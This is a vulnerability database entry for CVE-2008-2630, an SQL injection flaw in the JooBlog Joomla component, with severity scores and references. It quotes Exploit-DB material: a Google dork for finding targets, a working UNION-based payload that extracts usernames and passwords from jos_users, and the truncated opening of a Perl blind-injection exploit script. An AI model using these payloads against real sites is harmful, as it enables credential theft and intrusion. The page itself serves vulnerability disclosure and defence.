CVE-2008-2630
published 2008-06-10CVE-2008-2630: SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the CategoryID…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.02%
59.0th percentile
SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the CategoryID parameter in a category action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_jb2 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
exploitdb·2008-11-10
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
---
#######################################################
Joomla Component com_jb2(PostID) SQL-injetion Vulnerability
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_jb2
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"option=com_jb2 "PostID"
##################################################
#[~] Example:
http://localhost/Path/index.php?option=com_jb2&PostID=[exploit]
#[~] Exploit:
-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
##############################
Exploit-DB
Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
exploitdb·2008-06-03
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component JooBlog Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Dork : inurl:com_jb2 #\n";
print " # Usage: perl jooBlog.pl host path #\n";
print " # Example: perl jooBlog.pl www.host.com /joomla/ -c 5 #\n";
print " # #\n";
print " # Options: #\n";
print " # -c Category id #\n";
print " #######################################
No writeups or analysis indexed.
http://secunia.com/advisories/30443http://www.vupen.com/english/advisories/2008/1736/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42838https://www.exploit-db.com/exploits/5734http://secunia.com/advisories/30443http://www.vupen.com/english/advisories/2008/1736/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42838https://www.exploit-db.com/exploits/5734
2008-06-10
Published